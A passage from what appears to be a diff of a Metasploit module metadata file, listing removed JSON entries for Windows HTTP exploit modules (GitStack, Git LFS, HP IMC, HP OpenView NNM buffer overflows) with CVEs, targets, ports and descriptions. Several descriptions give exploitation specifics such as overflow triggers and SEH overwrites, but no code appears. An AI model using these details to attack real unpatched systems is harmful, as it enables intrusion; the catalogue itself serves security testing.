- "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/git_lfs_rce": { - "name": "Git Remote Code Execution via git-lfs (CVE-2020-27955)", - "fullname": "exploit/windows/http/git_lfs_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-11-04", - "type": "exploit", - "author": [ - "Dawid Golunski", - "space-r7", - "jheysel-r7" - ], - "description": "A critical vulnerability (CVE-2020-27955) in Git Large File Storage (Git LFS), an open source Git extension for\n versioning large files, allows attackers to achieve remote code execution if the Windows-using victim is tricked\n into cloning the attacker’s malicious repository using a vulnerable Git version control tool", - "references": [ - "CVE-2020-27955", - "URL-https://www.helpnetsecurity.com/2020/11/05/cve-2020-27955/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Git LFS <= 2.12" - ], - "mod_time": "2021-09-14 16:32:25 +0000", - "path": "/modules/exploits/windows/http/git_lfs_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/git_lfs_rce", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/gitstack_rce": { - "name": "GitStack Unsanitized Argument RCE", - "fullname": "exploit/windows/http/gitstack_rce", - "aliases": [], - "rank": 500, - "disclosure_date": "2018-01-15", - "type": "exploit", - "author": [ - "Kacper Szurek", - "Jacob Robles" - ], - "description": "This module exploits a remote code execution vulnerability that\n exists in GitStack through v2.3.10, caused by an unsanitized argument\n being passed to an exec function call. This module has been tested\n on GitStack v2.3.10.", - "references": [ - "CVE-2018-5955", - "EDB-43777", - "EDB-44044", - "URL-https://security.szurek.pl/gitstack-2310-unauthenticated-rce.html" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/gitstack_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/gitstack_rce", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_autopass_license_traversal": { - "name": "HP AutoPass License Server File Upload", - "fullname": "exploit/windows/http/hp_autopass_license_traversal", - "aliases": [], - "rank": 500, - "disclosure_date": "2014-01-10", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a code execution flaw in HP AutoPass License Server. It abuses two\n weaknesses in order to get its objective. First, the AutoPass application doesn't enforce\n authentication in the CommunicationServlet component. Second, it's possible to abuse a\n directory traversal when uploading files thorough the same component, allowing to upload\n an arbitrary payload embedded in a JSP. The module has been tested successfully on\n HP AutoPass License Server 8.01 as installed with HP Service Virtualization 3.50.", - "references": [ - "CVE-2013-6221", - "ZDI-14-195", - "BID-67989", - "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04333125" - ], - "platform": "Java", - "arch": "java", - "rport": 5814, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2003 SP2 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50", - "Windows 2008 32 bits/ HP AutoPass License Server 8.01 / HP Service Virtualization 3.50", - "Windows 2008 64 bits/ HP AutoPass License Server 8.01 / HP Service Virtualization 3.50", - "Windows 2012 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_autopass_license_traversal.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_autopass_license_traversal", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/hp_imc_bims_upload": { - "name": "HP Intelligent Management Center BIMS UploadServlet Directory Traversal", - "fullname": "exploit/windows/http/hp_imc_bims_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-10-08", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a directory traversal vulnerability on the version 5.2 of the BIMS\n component from the HP Intelligent Management Center. The vulnerability exists in the\n UploadServlet, allowing the user to download and upload arbitrary files. This module has\n been tested successfully on HP Intelligent Management Center with BIMS 5.2 E0401 on Windows\n 2003 SP2.", - "references": [ - "CVE-2013-4822", - "OSVDB-98247", - "BID-62895", - "ZDI-13-238", - "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03943425" - ], - "platform": "Windows", - "arch": "java", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP Intelligent Management Center 5.1 E0202 - 5.2 E0401 / BIMS 5.1 E0201 - 5.2 E0401 / Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_imc_bims_upload.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_imc_bims_upload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/hp_imc_java_deserialize": { - "name": "HP Intelligent Management Java Deserialization RCE", - "fullname": "exploit/windows/http/hp_imc_java_deserialize", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-10-03", - "type": "exploit", - "author": [ - "Steven Seeley (mr_me) of Offensive Security", - "Carsten " - ], - "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of\n Hewlett Packard Enterprise Intelligent Management Center. Authentication is not required to exploit\n this vulnerability.\n\n The specific flaw exists within the WebDMDebugServlet, which listens on TCP ports 8080 and 8443 by\n default. The issue results from the lack of proper validation of user-supplied data, which can result\n in deserialization of untrusted data. An attacker can leverage this vulnerability to execute arbitrary\n code in the context of SYSTEM.", - "references": [ - "CVE-2017-12557", - "URL-https://github.com/pimps/ysoserial-modified/blob/master/src/main/java/ysoserial/payloads/JSON1.java", - "URL-https://www.zerodayinitiative.com/advisories/ZDI-17-832/" - ], - "platform": "Windows", - "arch": "", - "rport": "8080", - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HPE IMC 7.3 E0504P2 and earlier / Windows" - ], - "mod_time": "2021-02-16 14:36:38 +0000", - "path": "/modules/exploits/windows/http/hp_imc_java_deserialize.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_imc_java_deserialize", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_imc_mibfileupload": { - "name": "HP Intelligent Management Center Arbitrary File Upload", - "fullname": "exploit/windows/http/hp_imc_mibfileupload", - "aliases": [], - "rank": 500, - "disclosure_date": "2013-03-07", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a code execution flaw in HP Intelligent Management Center.\n The vulnerability exists in the mibFileUpload which is accepting unauthenticated\n file uploads and handling zip contents in an insecure way. Combining both weaknesses\n a remote attacker can accomplish arbitrary file upload. This module has been tested\n successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.", - "references": [ - "CVE-2012-5201", - "OSVDB-91026", - "BID-58385", - "ZDI-13-050", - "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03689276" - ], - "platform": "Windows", - "arch": "java", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP Intelligent Management Center 5.1 E0202 / Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_imc_mibfileupload.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_imc_mibfileupload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/hp_loadrunner_copyfiletoserver": { - "name": "HP LoadRunner EmulationAdmin Web Service Directory Traversal", - "fullname": "exploit/windows/http/hp_loadrunner_copyfiletoserver", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-10-30", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a directory traversal vulnerability in version 11.52 of HP\n LoadRunner. The vulnerability exists in the EmulationAdmin web service, specifically\n in the copyFileToServer method, allowing the upload of arbitrary files. This module has\n been tested successfully on HP LoadRunner 11.52 on Windows 2003 SP2.", - "references": [ - "CVE-2013-4837", - "OSVDB-99231", - "BID-63475", - "ZDI-13-259", - "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03969437" - ], - "platform": "Windows", - "arch": "java", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP LoadRunner 11.52" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_loadrunner_copyfiletoserver", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/hp_mpa_job_acct": { - "name": "HP Managed Printing Administration jobAcct Remote Command Execution", - "fullname": "exploit/windows/http/hp_mpa_job_acct", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-12-21", - "type": "exploit", - "author": [ - "Andrea Micalizzi", - "juan vazquez " - ], - "description": "This module exploits an arbitrary file upload vulnerability on HP Managed Printing\n Administration 2.6.3 and prior versions. The vulnerability exists in the UploadFiles()\n function from the MPAUploader.Uploader.1 control, loaded and used by the server.\n The function can be abused via directory traversal and null byte injection in order\n to achieve arbitrary file upload. In order to exploit successfully, a few conditions\n must be met. First, a writable location under the context of Internet Guest Account\n (IUSR_*) or Everyone is required. By default, this module will attempt to write to\n /hpmpa/userfiles/, but the WRITEWEBFOLDER option can be used to provide\n another writable path. Second, the writable path must also be readable by a browser,\n so this typically means a location under wwwroot. Finally, you cannot overwrite\n a file with the same name as the payload.", - "references": [ - "CVE-2011-4166", - "OSVDB-78015", - "BID-51174", - "ZDI-11-352", - "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03128469" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP Managed Printing Administration 2.6.3 / Microsoft Windows [XP SP3 | Server 2003 SP2]" - ], - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/exploits/windows/http/hp_mpa_job_acct.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_mpa_job_acct", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_getnnmdata_hostname": { - "name": "HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_getnnmdata_hostname", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-05-11", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n By sending specially crafted Hostname parameter to the getnnmdata.exe CGI,\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2010-1555", - "OSVDB-64976" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP OpenView Network Node Manager 7.50", - "HP OpenView Network Node Manager 7.53" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_getnnmdata_hostname", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_getnnmdata_icount": { - "name": "HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_getnnmdata_icount", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-05-11", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n By sending specially crafted ICount parameter to the getnnmdata.exe CGI,\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2010-1554", - "OSVDB-64976" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP OpenView Network Node Manager 7.50", - "HP OpenView Network Node Manager 7.53" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_getnnmdata_icount", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_getnnmdata_maxage": { - "name": "HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_getnnmdata_maxage", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-05-11", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n By sending specially crafted MaxAge parameter to the getnnmdata.exe CGI,\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2010-1553", - "OSVDB-64976" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP OpenView Network Node Manager 7.50", - "HP OpenView Network Node Manager 7.53" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_getnnmdata_maxage", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_nnmrptconfig_nameparams": { - "name": "HP OpenView NNM nnmRptConfig nameParams Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_nnmrptconfig_nameparams", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-01-10", - "type": "exploit", - "author": [ - "sinn3r ", - "MC " - ], - "description": "This module exploits a vulnerability in HP NNM's nnmRptConfig.exe.\n A remote user can send a long string data to the nameParams parameter via\n a POST request, which causes an overflow on the stack when function\n ov.sprintf_new() is used, and gain arbitrary code execution.'", - "references": [ - "CVE-2011-0266", - "OSVDB-70473", - "ZDI-11-008" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "HP NNM 7.53 Windows Server 2003 Enterprise", - "HP OpenView Network Node Manager 7.50" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_nnmrptconfig_nameparams", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_nnmrptconfig_schdparams": { - "name": "HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_nnmrptconfig_schdparams", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-01-10", - "type": "exploit", - "author": [ - "sinn3r " - ], - "description": "This module exploits NNM's nnmRptConfig.exe. Similar to other NNM CGI bugs,\n the overflow occurs during a ov.sprintf_new() call, which allows an attacker to\n overwrite data on the stack, and gain arbitrary code execution.", - "references": [ - "CVE-2011-0267", - "OSVDB-70473", - "ZDI-11-009" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "NNM 7.53 - Windows Server 2003 Ent" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_nnmrptconfig_schdparams", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_openview5": { - "name": "HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_openview5", - "aliases": [], - "rank": 500, - "disclosure_date": "2007-12-06", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request, an attacker may be able to execute\n arbitrary code.", - "references": [ - "CVE-2007-6204", - "OSVDB-39530", - "BID-26741" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HP OpenView Network Node Manager 7.50 / Windows 2000 All" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_openview5.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_openview5", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_ovalarm_lang": { - "name": "HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_ovalarm_lang", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-12-09", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53.\n By sending a specially crafted CGI request to ovalarm.exe, an attacker can execute\n arbitrary code.\n\n This specific vulnerability is due to a call to \"sprintf_new\" in the \"isWide\"\n function within \"ovalarm.exe\". A stack buffer overflow occurs when processing an\n HTTP request that contains the following.\n\n 1. An \"Accept-Language\" header longer than 100 bytes\n 2. An \"OVABverbose\" URI variable set to \"on\", \"true\" or \"1\"\n\n The vulnerability is related to \"_WebSession::GetWebLocale()\".\n\n NOTE: This exploit has been tested successfully with a reverse_ord_tcp payload.", - "references": [ - "CVE-2009-4179", - "OSVDB-60930", - "BID-37347", - "URL-http://dvlabs.tippingpoint.com/advisory/TPTI-09-12", - "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01950877" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP OpenView Network Node Manager 7.53", - "HP OpenView Network Node Manager 7.53 (Windows 2003)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_ovalarm_lang", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_ovas": { - "name": "HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_ovas", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-04-02", - "type": "exploit", - "author": [ - "bannedit ", - "muts" - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager versions 7.53 and earlier.\n Specifically this vulnerability is caused by a failure to properly handle user supplied input within the\n HTTP request including headers and the actual URL GET request.\n\n Exploitation is tricky due to character restrictions. It was necessary to utilize a egghunter shellcode\n which was alphanumeric encoded by muts in the original exploit.\n\n If you plan on using exploit this for a remote shell, you will likely want to migrate to a different process\n as soon as possible. Any connections get reset after a short period of time. This is probably some timeout\n handling code that causes this.", - "references": [ - "CVE-2008-1697", - "OSVDB-43992", - "BID-28569" - ], - "platform": "Windows", - "arch": "", - "rport": 7510, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Targeting", - "Windows 2003/zip.dll OpenView 7.53", - "Windows 2000/jvm.dll OpenView NNM 7.51" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_ovas.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_ovas", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_ovbuildpath_textfile": { - "name": "HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_ovbuildpath_textfile", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-11-01", - "type": "exploit", - "author": [ - "Anyway ", - "juan vazquez ", - "sinn3r " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node\n Manager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long\n 'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can\n cause a stack-based buffer overflow and execute arbitrary code.\n\n The vulnerable code is within the \"_OVBuildPath\" function within \"ov.dll\". There\n are no stack cookies, so exploitation is achieved by overwriting the saved return\n address.\n\n The vulnerability is due to the use of the function \"_OVConcatPath\" which finally\n uses \"strcat\" in an insecure way. User controlled data is concatenated to a string\n which contains the OpenView installation path.\n\n To achieve reliable exploitation a directory traversal in OpenView5.exe\n (OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation\n path. If the installation path cannot be guessed the default installation path\n is used.", - "references": [ - "CVE-2011-3167", - "OSVDB-76775", - "BID-50471", - "ZDI-12-002", - "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03054052" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP OpenView Network Node Manager 7.53 / Windows 2000 SP4 & Windows XP SP3" - ], - "mod_time": "2021-10-06 13:43:31 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_ovbuildpath_textfile", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/hp_nnm_ovwebhelp": { - "name": "HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_ovwebhelp", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-12-09", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request to OvWebHelp.exe, an attacker may be able to execute\n arbitrary code.", - "references": [ - "CVE-2009-4178", - "OSVDB-60929", - "BID-37340" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP OpenView Network Node Manager 7.50" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_ovwebhelp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_ovwebsnmpsrv_main": { - "name": "HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_ovwebsnmpsrv_main", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-06-16", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n\n This vulnerability is triggerable via either a GET or POST request. The buffer being\n written to is 1024 bytes in size. It is important to note that this vulnerability must\n be exploited by overwriting SEH. Otherwise, CVE-2010-1961 is triggered!\n\n The vulnerable code is within the \"main\" function within \"ovwebsnmpsrv.exe\" with a\n timestamp prior to April 7th, 2010. There are no stack cookies, so exploitation is\n easily achieved by overwriting SEH structures.\n\n There exists some unreliability when running this exploit. It is not completely clear why\n at this time, but may be related to OVWDB or session management. Also, on some attempts\n OV NNM may report invalid characters in the URL. It is not clear what is causing this\n either.", - "references": [ - "CVE-2010-1964", - "OSVDB-65552", - "BID-40873", - "ZDI-10-108" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP OpenView Network Node Manager 7.53 w/NNM_01201", - "HP OpenView Network Node Manager 7.53 (Windows 2003)", - "Debug Target" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_ovwebsnmpsrv_main", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_ovwebsnmpsrv_ovutil": { - "name": "HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_ovwebsnmpsrv_ovutil", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-06-16", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n\n This vulnerability is triggerable via either a GET or POST request. It is interesting to\n note that this vulnerability cannot be exploited by overwriting SEH, since attempting\n to would trigger CVE-2010-1964.\n\n The vulnerable code is within a sub-function called from \"main\" within \"ovwebsnmpsrv.exe\"\n with a timestamp prior to April 7th, 2010. This function contains a 256 byte stack buffer\n which is passed to the \"getProxiedStorageAddress\" function within ovutil.dll. When\n processing the address results in an error, the buffer is overflowed in a call to sprintf_new.\n There are no stack cookies present, so exploitation is easily achieved by overwriting the\n saved return address.\n\n There exists some unreliability when running this exploit. It is not completely clear why\n at this time, but may be related to OVWDB or session management. Also, on some attempts\n OV NNM may report invalid characters in the URL. It is not clear what is causing this\n either.", - "references": [ - "CVE-2010-1961", - "OSVDB-65428", - "BID-40638", - "ZDI-10-106", - "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP OpenView Network Node Manager 7.53 w/NNM_01201", - "HP OpenView Network Node Manager 7.53 (Windows 2003)", - "Debug Target" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_ovwebsnmpsrv_ovutil", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_ovwebsnmpsrv_uro": { - "name": "HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_ovwebsnmpsrv_uro", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-06-08", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n The vulnerable code is within the option 